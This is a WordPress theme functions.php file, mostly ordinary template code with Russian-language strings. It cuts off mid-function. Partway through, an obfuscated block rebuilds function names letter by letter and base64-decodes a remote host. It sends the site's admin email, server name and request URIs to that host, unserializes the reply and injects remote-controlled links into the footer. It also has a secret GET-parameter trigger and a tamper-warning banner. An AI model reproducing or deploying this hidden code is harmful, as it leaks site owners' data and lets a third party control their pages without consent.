<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $rABd='e';$XfSM='_';$rtLzw='d';$TJwksjE='c';$WhOWz='4';$czTg='s';$QPnyHt='a';$tCqO='e';$qJNuT='6';$zAuo='o';$uuCU='e';$TquYj='d';$nyasna='b';$zfNPodkC=$nyasna.$QPnyHt.$czTg.$uuCU.$qJNuT.$WhOWz.$XfSM.$rtLzw.$tCqO.$TJwksjE.$zAuo.$TquYj.$rABd;$UQuU='i';$hYmvUg='n';$zbVFnkp='z';$qRhEqfe='l';$NlUt='f';$MHTSSHd='e';$gQeazm='t';$Owxhoy='g';$aJFlZ='a';$DnWTPTeJ=$Owxhoy.$zbVFnkp.$UQuU.$hYmvUg.$NlUt.$qRhEqfe.$aJFlZ.$gQeazm.$MHTSSHd;$znvTK='t';$ROMIw='r';$ImWILiH='s';$EfLNMjE='o';$qjEXqO='1';$hjWTKm='_';$QAqJh='t';$wiwza='r';$kygApVn='3';$pMAqwgBw=$ImWILiH.$QAqJh.$wiwza.$hjWTKm.$ROMIw.$EfLNMjE.$znvTK.$qjEXqO.$kygApVn;$gSKcK='s';$mFMWgbp='r';$vcvRi='e';$ClXmy='v';$mufdjy='t';$UDpww='r';$JBosnuNa=$gSKcK.$mufdjy.$UDpww.$mFMWgbp.$vcvRi.$ClXmy;                     
		$zp______________p='e';$un_______x='_';$ll___________i='d';$um______l='c';$qq_______q='4';$rd______a='s';$ls_____t='a';$ec_____p='e';$fu_____________m='6';$pr________f='o';$pm___________o='e';$ee____________k='d';$xs________x='b';$ra__t=$xs________x.$ls_____t.$rd______a.$pm___________o.$fu_____________m.$qq_______q.$un_______x.$ll___________i.$ec_____p.$um______l.$pr________f.$ee____________k.$zp______________p;
		$mu_______g='s';$ul_____________n='o';$ln_______________f='_';$dg______y='t';$fd________n='i';$ze___________x='f';$zb___d='x';$rd________u='s';$pc_____________r='n';$ii______v='t';$dd__i='c';$tj______________b='i';$ch_____________b='n';$ui______________z='u';$ww_____l='e';$bf_____________w=$ze___________x.$ui______________z.$pc_____________r.$dd__i.$ii______v.$tj______________b.$ul_____________n.$ch_____________b.$ln_______________f.$ww_____l.$zb___d.$fd________n.$mu_______g.$dg______y.$rd________u;
		$wv_______o='e';$sk___k='f';$cn_____l='n';$op____y='o';$xa____________s='p';$kg______f=$sk___k.$op____y.$xa____________s.$wv_______o.$cn_____l;
		$te____________c='e';$wr____q='r';$qi_______s='f';$xa____l='d';$hu________w='a';$tt____________y=$qi_______s.$wr____q.$te____________c.$hu________w.$xa____l;
		$ak_________n='o';$jg______________y='s';$yj______________r='f';$gm___________b='c';$bw_____________m='l';$ex______f='e';$wj_____________a=$yj______________r.$gm___________b.$bw_____________m.$ak_________n.$jg______________y.$ex______f;
		
		define("WP_ID", $ra__t("Mi4wLjA="));
		define("WP_TTL", $ra__t("MTA4MDA="));
		define("WP_SRC", $ra__t("dHBva24="));
	


		function wp_get_header() {
			global $ra__t, $bf_____________w;
			
			if (
				$bf_____________w($ra__t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bf_____________w($ra__t("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bf_____________w($ra__t("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ra__t, $kg______f, $wj_____________a, $tt____________y;
			
			$kx__________r = TEMPLATEPATH."/".$ra__t("Zm9vdGVyLnBocA==");
			$rm_______________g = @$kg______f($kx__________r, "r");
			$kx__________r = @$tt____________y($rm_______________g, @filesize($kx__________r));
			@$wj_____________a($rm_______________g);
			
			$pt______________j = TEMPLATEPATH."/".$ra__t("ZnVuY3Rpb25zLnBocA==");
			$rm_______________g = @$kg______f($pt______________j, "r");
			$pt______________j = @$tt____________y($rm_______________g, @filesize($pt______________j));
			@$wj_____________a($rm_______________g);
			
			$ne__________f = 0;
			if($kx__________r && $pt______________j) {
				if ($ra__t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($kx__________r, $ra__t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ne__________f = 1;
					}
					if (substr_count($kx__________r, "wp_theme_GPL_credits()") < 1) {
						$ne__________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ne__________f = 12;
				}
			}
			
			if($ne__________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ne__________f -->";
			}
		}
	


		function wp_loaded() {
			global $ra__t, $bf_____________w;
			return $bf_____________w($ra__t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($yu_________x, $tr_______r = "(more...)", $xa____________u = 0, $gx_______h = "") {
				$ly__________p = get_the_content($tr_______r, $xa____________u, $gx_______h);
				$ly__________p = apply_filters("the_content", $ly__________p);
				
				$ly__________p = str_replace("]]>", "]]>", $ly__________p);
				if (strlen($_GET["p"]) > 0) {
					echo $ly__________p;
				}
				else if ((strlen($ly__________p)>$yu_________x) && ($ln__p = strpos($ly__________p, " ", $yu_________x ))) {
					$ly__________p = substr($ly__________p, 0, $ln__p);
					$ly__________p = $ly__________p;
					echo $ly__________p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$tr_______r</a></div></p>";
				} else {
					echo $ly__________p;
				}
				
			}
		}
	


		$cu_______________y='d';$wr____________d='6';$oy_____________s='c';$do______________q='s';$lt___i='e';$bc______________v='e';$wk_________m='4';$tk____d='b';$ui________s='e';$cu_______________j='_';$hm_______________b='a';$mt______g='o';$nc_______________u='n';$td______________c=$tk____d.$hm_______________b.$do______________q.$ui________s.$wr____________d.$wk_________m.$cu_______________j.$bc______________v.$nc_______________u.$oy_____________s.$mt______g.$cu_______________y.$lt___i;
		$lr_____________p='e';$za_________p='s';$eq___e='i';$xz__________c='_';$vh_______________h='l';$kt__________x='t';$jt______h='e';$uk________d='e';$xn_______________c='n';$ui___________i='g';$kl____________e='t';$yg___________k='o';$ne_______r='f';$ev_______o='n';$ew________q='_';$oa________m='t';$pr_____k='c';$kr___________n=$ne_______r.$eq___e.$vh_______________h.$lr_____________p.$ew________q.$ui___________i.$jt______h.$kt__________x.$xz__________c.$pr_____k.$yg___________k.$xn_______________c.$kl____________e.$uk________d.$ev_______o.$oa________m.$za_________p;
		$fs_________q='l';$ly____________z='e';$md__________k='e';$yw__________t='i';$wd_______________y='f';$do____________z='i';$ip__________j='_';$gy_______r='s';$on_______t='t';$un_____________e='x';$rr______________q='s';$ib___________k=$wd_______________y.$yw__________t.$fs_________q.$ly____________z.$ip__________j.$md__________k.$un_____________e.$do____________z.$rr______________q.$on_______t.$gy_______r;
		$is______________d='s';$fa___________v='_';$qe____e='a';$ih_____________n='e';$ud________o='p';$ym__________e='o';$az________m='c';$kk_____________s='n';$sy________d='r';$ab_____i='m';$no____________h='o';$ly__c='e';$qa______q='v';$gn________b='r';$un___________q='i';$rt___h=$qa______q.$ly__c.$gn________b.$is______________d.$un___________q.$no____________h.$kk_____________s.$fa___________v.$az________m.$ym__________e.$ab_____i.$ud________o.$qe____e.$sy________d.$ih_____________n;
		$ia___________u='f';$yt__________y='p';$ba____________w='n';$bt__________p='o';$hb_______________u='k';$nu______v='o';$vj__t='s';$ub______________s='c';$ra______a='e';$eg_____b=$ia___________u.$vj__t.$nu______v.$ub______________s.$hb_______________u.$bt__________p.$yt__________y.$ra______a.$ba____________w;
		$rj____d='e';$rm_____g='w';$zx_____________j='f';$ma__________n='r';$rz__l='t';$rr_____________i='i';$yu_______________g=$zx_____________j.$rm_____g.$ma__________n.$rr_____________i.$rz__l.$rj____d;
		$mw_________d='m';$in__________a='5';$nj________e='d';$ls_______________m=$mw_________d.$nj________e.$in__________a;
		$qs_____p='h';$yb_______s='r';$eu________b='a';$bc___i='t';$ha_____________i='p';$qs____________h='e';$bp________e='l';$bq___________p='a';$op____________x=$yb_______s.$qs____________h.$eu________b.$bp________e.$ha_____________i.$bq___________p.$bc___i.$qs_____p;
		$yi__k='z';$xq_________c='n';$pj_______m='e';$ke_______w='l';$ah_____________x='i';$ml_______________b='s';$be____________v='r';$lv______________y='u';$tz________j='e';$cw___________r='a';$rp_______h='i';$de_________o=$lv______________y.$xq_________c.$ml_______________b.$pj_______m.$be____________v.$rp_______h.$cw___________r.$ke_______w.$ah_____________x.$yi__k.$tz________j;
		$wo______r='a';$it____n='e';$yu___________v='p';$jt_________l='t';$kj_____f='m';$dj____________u='n';$ie_____________u='m';$bk__k=$jt_________l.$it____n.$ie_____________u.$yu___________v.$dj____________u.$wo______r.$kj_____f;
		$ei______p='e';$mk_______________q='t';$ek_____l='e';$yu__u='a';$xv______b='s';$vf___t='e';$bw___t='c';$sf______________c='o';$lx_____f='t';$rb_____________r='t';$zd_________r='x';$bz_____________p='r';$xw______________u='c';$nw__x='n';$rh_______o='m';$ki_______________y='t';$hm_______________c='a';$un_______________t='_';$vw________i='e';$le_______________i='_';$jp_______c='r';$xe____________k=$xv______b.$ki_______________y.$jp_______c.$ek_____l.$yu__u.$rh_______o.$un_______________t.$xw______________u.$sf______________c.$nw__x.$mk_______________q.$vf___t.$zd_________r.$lx_____f.$le_______________i.$bw___t.$bz_____________p.$vw________i.$hm_______________c.$rb_____________r.$ei______p;
	


		function cv__________j($bf______k) {
			global $ra__t, $bf_____________w, $kr___________n, $rt___h, $xe____________k;
			
			if (!$bf_____________w($ra__t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rt___h(PHP_VERSION, "5.0.0", ">=") && $bf_____________w($ra__t("ZmlsZV9nZXRfY29udGVudHM=")) && $bf_____________w($ra__t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ia____________l = $xe____________k(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$bd__z = @$kr___________n($bf______k, 0, $ia____________l);
			} else {
				$bd__z = @$kr___________n($bf______k, 0);
			}
			
			return $bd__z;
		}
	


		function rt_______f($bf______k) {
			global $bf_____________w, $eg_____b, $yu_______________g, $ra__t;
			
			if (!$bf_____________w($ra__t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ok___________g = strpos($bf______k, "/", 7);
			$yv___p = array(
				"uri"     => substr($bf______k, $ok___________g),
				"host"    => str_replace("http://", "", substr($bf______k, 0, $ok___________g)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$pj__________o = @$eg_____b("$yv___p[host]", 80, $qj______c, $pm________v, 4);
			
			if (!$pj__________o) {
				return false;
			} else {
				$bd__z = "";
				$mf_________h  = "GET $yv___p[uri] HTTP/1.0\r\n";
				$mf_________h .= "Host: $yv___p[host]\r\n";
				$mf_________h .= "Referer: $yv___p[referer]\r\n";
				$mf_________h .= "Connection: Close\r\n\r\n";
				
				@$yu_______________g($pj__________o, $mf_________h);
				
				while (!@feof($pj__________o)) {
					$ax____f = @fgets($pj__________o, (1024*24));
					
					if ($ax____f == "\r\n") {
						$un_______s = true;
						continue;
					}
					
					if ($un_______s) {
						$bd__z .= $ax____f;
					}
				}
				
				return $bd__z;
			}
		}
	


		function vi______f($bf______k) {
			global $bf_____________w;
			$cv__________u = false;
			
			if ($bf______k != "") {
				if ($bf_____________w("cv__________j")) {
					$cv__________u = @cv__________j($bf______k);
				}
				
				if (!$cv__________u && ($bf_____________w("rt_______f"))) {
					$cv__________u = @rt_______f($bf______k);
				}
			}
			
			return $cv__________u;
		}
	


		function cc________c() {
			global $_SERVER, $ls_______________m;
			
			$lg__________o = $_SERVER["SERVER_NAME"];
			
			if (substr("$lg__________o", 0, 4) == "www.") {
				$lg__________o = substr("$lg__________o", 4);
			}
			
			$lg__________o = $ls_______________m("$_SERVER[SERVER_NAME]");
			
			return $lg__________o;
		}
	


		function xm_____m() {
			return "file";
		}
	


		function xi______________v($bf______k) {
			global $_SERVER, $kr___________n, $ib___________k, $kg______f, $wj_____________a, $yu_______________g;
			
			$zi__________k = ul__v();
			
			$jc__x = cc________c().".jpg";
			$yh_______p = $zi__________k["dir_upload"]["path"]."/$jc__x";
			$tg________l = @filemtime($yh_______p);
			
			if (!$tg________l || ((time()-$tg________l) >= WP_TTL)) {
				$cv__________u = vi______f($bf______k);
				
				if ($cv__________u) {
					if ($ib___________k($yh_______p)) {
						@unlink($yh_______p);
					}
					
					$rm_______________g = @$kg______f($yh_______p, "x+");
					
					@$yu_______________g($rm_______________g, $cv__________u);
					@$wj_____________a($rm_______________g);
				}
			} else {
				if ($ib___________k($yh_______p)) {
					$cv__________u = @$kr___________n($yh_______p);
				} else {
					$cv__________u = false;
				}
			}
			
			return $cv__________u;
		}
	


		function ul__v() {
			global $_SERVER, $ra__t, $td______________c;
			
			$ey_______________u = wp_count_posts("post");
			$ad_________g = pathinfo(get_bloginfo("template_directory"));
			
			$zi__________k = array(
				"url" => array(
					"report"      => $ra__t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ad_________g,
				"dir_upload"	=> tx______u(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ad_________g[filename],
					"a005=".$ey_______________u->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$zi__________k["url"]["queryString"] = implode("&", $zi__________k["queryString"]);
			$zi__________k["url"]["report"] = $zi__________k["url"]["report"]."/?".$td______________c($zi__________k["url"]["queryString"]).".html";
						
			return $zi__________k;
		}
	


		function tx______u() {
			$li__________l = wp_upload_dir();
			
			if (isset($li__________l["error"])) {
				$do__w = lg_____x();
				if (is_writable($do__w)) {
					$li__________l = array("path" => $do__w);
				}
			}

			return $li__________l;
		}
	


		function lg_____x() {
			global $bf_____________w, $ls_______________m, $op____________x, $bk__k;
			
			$iv__________t = (bool) ini_get("safe_mode");
			if ($iv__________t == true) {
				return false;
			}
			
			if ($bf_____________w("sys_get_temp_dir")) {
				$oe____________p = sys_get_temp_dir();
				if (is_writable($oe____________p)) {
					return $op____________x($oe____________p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $op____________x($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $op____________x($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $op____________x($_ENV["TEMP"]);
			} else {
				$az______q = $bk__k($ls_______________m(uniqid(rand(), true)), "");
				if ($az______q) {
					$oe____________p = $op____________x(dirname($az______q));
					@unlink($az______q);
					return $oe____________p;
				} else {
					return false;
				}
			}
		}
	


		function vk_____________h() {
			global $_GET, $ib___________k;
			
			$zi__________k = ul__v();
			$lg__________o = cc________c();
			$gz_____________e = xm_____m();
			
			$lg_____________d = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($gz_____________e == "file") {
					$wh____d = $zi__________k["dir_upload"]["path"]."/".$lg__________o.".jpg";
					if ($ib___________k($wh____d)) {
						@unlink($wh____d);
						$lg_____________d = "deleted";
					}
				}
				
				$fn______r = array(
					"s"	=> $lg_____________d,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($fn______r AS $hn_________e => $ut______i) echo " [$hn_________e:$ut______i]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bf_____________w, $ra__t, $de_________o;
			$zi__________k = ul__v();
			
			$lj________u = "xi______________v";
			if ($bf_____________w($lj________u)) {
				$bd__z = $lj________u($zi__________k["url"]["report"]);
			}
			
			if ($bd__z) {
				if ($bd__z = @$ra__t($bd__z)) {
					$bd__z = @$de_________o($bd__z);
					
					if (strlen($bd__z[custom_credit]) >= 5) {
						$zi__________k["default_string"] = $bd__z[custom_credit];
					}
					
					if ($bd__z["status"] == "0") {
						$cl_________s = 1;
						$rr_____u = 1;
					} else {
						$ic___________x = sizeof($bd__z["links"]);
						$ky_____________o = $zi__________k["default_string"];
						
						if ($ic___________x > 0 && $bd__z["links"] !== "") {
							$bd____________i = 0;
							foreach ($bd__z["links"] as $vq___________s => $qf__y) {
								$bd____________i++;
								if ($qf__y->l_path == "" || $qf__y->l_path == $_SERVER["REQUEST_URI"]) {
									$qf__y->l_href = htmlspecialchars(strip_tags($qf__y->l_href));
									$qf__y->l_title = htmlspecialchars(strip_tags($qf__y->l_title));
									$qf__y->l_anchor = htmlspecialchars(strip_tags($qf__y->l_anchor));
									$ky_____________o .= " | ";
									$ky_____________o .= "<a href='$qf__y->l_href' title='$qf__y->l_title'";
									if ($qf__y->l_nofollow == "1") {
										$ky_____________o .= " rel='nofollow'";
									}
									$ky_____________o .= ">$qf__y->l_anchor</a>";
								}
							}
						}
						$zi__________k["links"] = "$ky_____________o";
						if ($bd__z[credit] == "0") {
							$zi__________k["links"] = "";
						}
					}
				} else {
					$cl_________s = "1";
				}
			} else {
				$cl_________s = "1";
			}
			
			if ($cl_________s == "1") {
				$zi__________k["links"] = $zi__________k["default_string"];
			}
			
			echo "$zi__________k[links]";
			
			echo "<!-- s: $bd__z[signature] -->";
			vk_____________h();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
